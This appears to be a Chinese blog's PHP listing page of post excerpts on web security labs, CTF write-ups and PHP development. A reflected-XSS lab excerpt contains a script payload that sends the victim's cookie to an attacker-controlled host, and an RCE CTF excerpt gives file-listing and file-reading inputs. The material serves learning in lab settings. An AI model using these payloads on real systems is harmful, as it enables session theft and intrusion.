PHP

文件包含(大纲)

文件包含(总结or大纲) 导致原因 使用前4个函数包含新的文件时,只要文件内容包含符合php语法规范,任意扩展名都可以被php解析,当包含非php语法规范时,将会暴露其源代码。后两个函数会造成敏感文件读取。 如何利用: include()等函数通过动态变量的方式引入需要包含的文件。 攻击者可以控制该动态变量。 总的来说,就是有可以传入include()等函数的可控变量。 本地文件包含 ex:

SQL注入注入方式(大纲)

SQL注入注入方式(大纲) 常规注入 通常没有任何过滤,直接把参数存放到SQL语句中。 宽字节注入 GBK 编码 两个字节表示一个字符 ASCII 编码 一个字节表示一个字符 MYSQL默认字节集是GBK等宽字节字符集 原理: 设置MySQL时错误配置为set character_set_client=gbk (它将客户端字符集设置为 GBK 编码),这样会引发编码转化,导致出现注入漏洞。

OI 回忆录 壹

写在最前面:本文完稿时间为 2022.1。 续集为 待补充。 之前一直没想着发出来,后来想想,也就作罢了。 有个链接挂了,那是因为衢州华茂外国语学校已经不存在了,学校自己网站里面的东西不挂才怪。 找了个学校集团的链接挂着吧,希望不要挂了。http://www.huamao.com/index.php/report/info/648/651/1812.html 原标题:我为何学 OI? 新的一年,

CSRF(Steam的链接不用随便点)

漏洞详解 CSRF 漏洞原理: 攻击者会冒充或利用用户本人对web服务器发送请求,然而web服务器无法识别该请求是否为用户本人所发送,因此造成各种危害。 漏洞利用过程: 1)首先需要用户登录了上网站,并产生了cookie 2)构造恶意链接 3)在用户还保持着登录状态时,去诱导用用户点击链接 4)链接中的恶意脚本在用户的浏览器上执行,进而达到攻击者的目的 漏洞危害: 攻击者会利用用户的名义去进行发送

HackMyVm-venus(31-50)

HackMyVm-venus(31-50) 0x31(curl 指定UA访问) 0x32(别名) 0x33(解压缩) 0x34(strings查看字符) 0x35(后两位小写字母爆破) 0x36(二维码) 扫一下就行了 0x37(iso镜像) iso特别小直接查看字符串 0x38(两个文件的不同) 0x39(openssl解密) 0x40(莫斯电码) 0x4

MSF渗透使用说明

实验环境   前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通   如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙   使用工具:kali   靶机:windows server 2008 R2 ip:10.0.0.129   攻击机器:kali IP:1

CTF-Show-JWT系列

CTF-Show-JWT系列 Problem 1 前置知识 思路 尝试访问: https://d6bd63c3-e67e-477a-ba67-fc6c81604997.challenge.ctf.show/index.php/admin/ 抓包发现auth为一串base64编码,对其进行解码后发现:这是jwt认证的token。 我们仔细观察发现,该jwt采用空算法加密,这就代表着我们可以随意篡

powerpoint:幻灯片中设置打字机效果

一,指定动画 选中文字后,点工具栏 动画 标签,然后在运画效果中选 出现如图: 说明:刘宏缔的架构森林—专注it技术的博客,网址:https://imgtouch.com本文: https://blog.imgtouch.com/index.php/2024/02/25/powerpoint-huan-deng-pian-zhong-she-zhi-da-zi-ji-xiao-

powerpoint:给幻灯片每页都添加logo

一,给幻灯片每页都添加logo 1,未插入前: 2,打开母版 点工具栏上的 视图 标签,再点击 幻灯片母版 按钮: 3,点击第一个页面,再点击 工具栏上的 插入 标签: 点工具栏上的图片 按钮,从菜单中选择 来自文件的图片: 把选择的图片调整好位置和大小,在工具栏点击 关闭母版 按钮: 添加完成后在页面上的效果: 说明:刘宏缔的架构森林—专注it技术的博客,网址:https://img

Prefab优化:预制体最有效

我们针对UWA本地资源检测最新的Shader Analyzer功能所涉及到的新规则和相关知识点进行了讲解。 这些看似细小的知识点,很容易在大家的开发和学习过程中被疏忽,而长期的问题积累最终都会反映到项目的性能表现上。 为此,我们将这些规则列出,并且以一个个知识点的形式向大家逐一解读。 参考: 我们将继续讲解UWA本地资源检测中和Prefab相关的规则:“使用了Outline的Text组件”、“使用

Hackademic.RTB

信息收集 靶机启动 IP扫描 端口扫描 22 没有开放 80 开放 目录扫描 SQL注入 确认注入点 手动访问80端口 欢迎进入黑客学院的挑战 请进入 targer 努力获取 toot 权限 跳转后可以看到进入了hackademic_rtb1目录, 这里说目标 goal 要读取root/key.txt文件 看源代码 看到cms 是wordpress的1.5.1.1

ThinkPHP6实现增删改查接口

ThinkPHP增删改查接口实现 数据库连接配置 当.env文件中存在数据库配置时,这些配置会覆盖config/database.php中的相应配置。 通常在config/database.php中设置数据库连接的默认值或开发环境的值,并在.env文件中根据实际部署环境(如测试或生产环境)覆盖这些值。这样,你可以通过更改环境变量来调整配置,而无需修改代码中的配置文件,这有助于提高应用的安全性和灵活

VScode 配置php调试环境变量. phpstudy + nginx+ php7.4, 解决无法断点问题

参考大佬的帖子 https://blog.csdn.net/qq_61739597/article/details/132433472  (远程调试) 踩坑经验 我从phpstudy 添加好网站才进行配置. 当配置好之后,一直没有断点下来.  非常郁闷找不到问题.  写了一个demo, php文件, 通过phpstudy添加网站发现可以断点下来 后来果断重新添加一下

直播系统源代码,iOS端截屏时隐藏内容

直播系统源代码,iOS 禁止截屏,手机截屏时隐藏内容,或自定义截屏后的内容。核心是利用UITextField的secureTextEntry属性隐藏内容,注意该功能仅iOS13.2及以上支持。UITextField在开启密码模式后,在截屏录屏时隐藏一个子视图。注:模拟器左上角的截图不支持UITextField的密码隐藏。如果要模拟真机截图,可以点击模拟器菜单 Device->Trigger

直播系统app源码,Android端与屏幕相关的几个注意事项

直播系统app源码,Android端与屏幕相关的几个注意事项 Android端的宽屏适配、禁止截屏和保持屏幕常亮,是直播系统app源码开发时需要注意的三个重要事项。 宽屏适配 越来越多的手机厂商趋向于全面屏设计,屏幕比例均超过过去常见的 16:9 比例。超大屏幕比例的设计对于 Android App 来说,存在一个屏幕适配的问题。我们需要在 Manifest 清单文件中定义一个更大值

P10189 [USACO24FEB] Maximizing Productivity B 题解

先说说暴力做法: 每次遍历一遍,看看是否满足 (t_i + s le c_i),满足就计数,不满足就挂。单次时间复杂度显然为 (O(N)),总得时间复杂度约为 (O(NQ)),TLE是肯定的~ 暴力代码 评测记录,开了优化也只有 20pts。 暴力废了,开始整正解。 (2 times 10^5)?二分法,了解一下? 然后,然后遇到了个问题:二分这东西要求有序,可是 (c_i) 与 (t_i

PHP.安装SQL SERVER 驱动

01. 取phpinfo 信息;  02. 登陆网址,查对应版本的文件下载: https://learn.microsoft.com/en-us/sql/connect/php/release-notes-php-sql-driver?view=sql-server-ver16#previous-releases 下载文件后,将文件解压到任何指定的目录 ; 按01步骤的内容,直接取驱

变量名称规则

变量命名分为普通变量、静态变量、局部变量、全局变量、Session变量等方面的命名规则。 变量名必须以字母或下划线开头,不能以数字开头。例如,$1a和$a1都是非法的变量名,而$a和$1则是可以接受的。1 变量名只能包含字母、数字和下划线。在PHP中,变量名区分大小写,例如$abc和$ABC代表不同的变量。 避免使用保留字作为变量名,因为保留字可能被其他函数或语

cyi青少年CTF擂台挑战赛 2024 #Round 1 wp

WEB EasyMD5 靶机真不敢恭维 一个文件上传界面,得上传pdf 传两个pdf 这篇文章看到md5碰撞,找到个工具fastcoll_v1.0.0.5 https://www.win.tue.nl/hashclash/ 后续写的wp,flag可能不同 PHP的后门 https://blog.csdn.net/Shadow_DAI_990101/article/details/126

接入PayPal支付

注:最底部有sdk的代码文档说明,如是代码问题可直接参考底部官方sdk文档 安装SDK   生成支付链接 图01   图02(注:测试支付时,在沙箱模式下用沙箱个人账号登录就可以支付,企业账号那是收款账号) 选择支付方式,点击继续查看订单就能跳转到支付成功的地方了 WebHook 从参考图01中的Default Application点击进去,在最底部有个Add

RCE Post篇

ctfshow web58&web59&web60&web61&web62 首先应该查看phpinfo看看禁用了哪些函数 c=print_r(scandir(dirname('FILE'))); 可以查看文件有哪些 可以查出存在flag.php 但是这里输入发现phpinfo被禁用了 可以使用 file_get_contents("flag.php") payloa

对 uri分析获取mime type和 raw data

data:image/png;base64,iVBORw0KCYII= data:text/html;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtDQo= 原始数据格式  data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAcAAAAOCAYAAADjXQYbAAAAAXNSR0IArs4c6QAAAARnQU1BA

第一周周测

1、尝试绕过xiusafe.com的cdn,要求尝试所有可能的手段并截图 2、针对testfire.net端口进行扫描,子域名爆破,弱口令尝试 3、搭建pikachu靶场 改一下数据库连接密码 访问install.php 忘截图了 4、尝试通关pikachu、SQL注入的任意一关,要求分别使用手工和sqlmap 1' union select 1,database(

【HMS Core】应用内支付成功后,返回结果验签失败

​【问题描述】 应用内支付成功后,返回结果验签失败   【解决方案】 验签失败可以从以下几点进行逐一排查 1.签名算法是否匹配 (可以通过获取getSignatureAlgorithm 来验证目前使用的签名算法) ​ 2.签名公钥是否正确 ​ 确保公钥获取正确,签名算法如果打开了SHA256WithRSA/PSS,则建议关闭,或者代码匹配。 3.待签名字符串是否正确 打印下对应的字段 ​

反射型xss的post请求获取cookie

攻击者构造的网站地址:192.168.10.12:100 受害者主机:192.168.10.134 目标服务器:192.168.10.1 步骤一: 受害者主机访问目标服务器 根据提示登录 步骤二: 输入xss Payload <script>document.location = 'http://192.168.10.12:100/pkxss/xcookie/cookie.php?c

MySQL 及 SQL 注入

如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户

拯救php性能的神器webman-初入门

无意间发现的这个神器webman,真是秋名山上的腾源拓海! 该框架是workerman下的一个web开发的生态,我们可以先看看这里workerman的官方网站。 workerman早有耳闻,知道它蛮厉害的,跟swoole也不相上下,这次主要是说webman,可以看这里  话不多说,赶紧上手。 1. 安装 这个安装真的很简单,就一句话  composer create

centos7安装php7.4

centos7安装php7.4 https://www.zzy1217.com/blogs/php/install.html   

think-swoole的一些坑

一、php连接websocket服务器内部通信   1.1、安装ratchet/pawl   composer require ratchet/pawl   1.2、代码示例:  

<<  <  49  50  51  52  53  54  55  56  57  58  59  >  >>